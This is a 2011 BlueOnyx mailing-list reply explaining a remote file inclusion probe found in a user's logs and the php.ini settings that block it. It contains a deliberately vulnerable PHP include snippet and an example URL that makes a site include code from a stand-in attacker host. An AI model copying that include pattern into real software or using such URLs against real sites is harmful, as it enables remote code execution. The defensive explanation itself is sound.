[BlueOnyx:08498] Re: Making sense of log files...

Michael Stauber mstauber at blueonyx.it
Fri Sep 16 15:47:45 -05 2011 

Hi Wayne,

> but recently I've been paying more attention to them.
> 
> this is the log from dfix:
> 
> Not really sure what it means other than it blocked the IP address.
> 
> ?p=1693 is a valid link on my site,  does that mean this is the page they
> tried to take over and they are coming from hackorea ?

Yeah, this is a common attack vector for PHP scripts. Someone probes your PHP 
scripts to see if he can trick it into loading, including and running an 
externally hosted PHP script.

In your case the external script would just show "ShiroHigeShiroHige" 
somewhere within your page *if* the probing had revealed a vulnerability and 
only the attacker would see that. But then the attacker would probably have 
escalated by including something more nasty. :o)

Say you have this code on your website:

<?
// This is a vulnerable index.php and the code below is a really bad idea:
include_once($page);
/* ... rest of your page */
?>

Now *if* you'd usually call subpages for your site with something like this 
...

http://www.site.com/index.php?page=<number>

... then the attacker could trick your badly coded index.php into loading an 
external and even remotely hosted PHP file by simply calling up your index.php 
this way:

http://www.site.com/index.php?page=http://attacker.net/include_me.txt

To prevent stuff like that from happening, Blueonyx usually sets the following 
two switches in php.ini:

allow_url_fopen = Off
allow_url_include = Off

These are the safe settings for them and prevent that PHP scripts can access 
and include remotely hosted non-local PHP scripts.

"allow_url_fopen" prevents access of PHP scripts to non-local files which are 
called via an URL.

"allow_url_include" controls if it is allowed to include remotely hosted PHP 
code into your local scripts for execution. Which is a really bad idea, so it 
should always be set to "Off". 

There may be reasons when you may want to allows "allow_url_fopen", though. 
Like when your PHP script needs to access a remote RSS feed, or needs to 
connect somewhere else to see if there are updates available for its 
components. However: If you allow "allow_url_fopen", be sure to double check 
that "allow_url_include" is set to "Off".

Short summary: Access = fine. Include = bad.

-- 
With best regards

Michael Stauber

More information about the Blueonyx mailing list